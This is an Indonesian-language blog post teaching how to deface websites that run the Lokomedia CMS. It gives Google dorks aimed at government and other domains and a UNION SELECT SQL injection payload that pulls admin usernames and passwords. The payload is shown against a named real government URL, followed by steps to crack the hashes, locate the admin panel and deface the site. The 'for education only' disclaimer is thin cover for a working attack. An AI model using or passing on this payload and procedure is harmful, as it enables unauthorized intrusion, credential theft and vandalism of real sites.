kali ini saya akan membagikan tutorial "Deface Sql Lokomedia"
Dork:
- inurl:kategori-23-hiburan.html - inurl:hal-tentang-kami.html - inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
-inurl:statis-1.html tambahin site:co.il / go.id / .com di akhir dork biar dapet fressh :v
(ganti angka satu dengan angka sesuka kalian biar dapet yang fresh :v #trustmeitswork)
exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1. Buka Google buat dorking google.com
pilih target sesuka anda :)
2.masuk ke webnya :3
Masukan exploit nya
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
yang awalnya
http://diskominfo.pemkomedan.go.id/statis-1.html
jadi
http://diskominfo.pemkomedan.go.id/statis--1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+.html
Setelah itu klik enter,maka halamanya akan berubah menjadi seperti ini
Setelah itu klik CTRL+U
setelah anda masuk ke bagian view-source
lihat bagian
<title> </title>
akan terlihat username dan password admin nya :D
jadi kita cairin dulu passnya di https://hashkiller.co.uk/
setelah itu tinggal nyari admin loginya :p
biasanya terletak di
site.co.li/admin
site.co.li/adminweb
site.co.li/administrator
cite.co.li/redaktur
kalo ga ketemu coba pake tool admin finder yang pernah saya share sebelumnya Di Sini
setelah itu tinggal EXSEKUSI SENDIRI :D goodluck :*
*note:web yang saya gunakan di atas tidak beneran saya deface itu cuma buat contoh jangan salah paham ya gaes
*kami tidak bertanggung jawab bila anda terkena masalah | ini hanya untuk pendidikan semata :)|
Thx to= Cyruscyber
No comments:
Post a Comment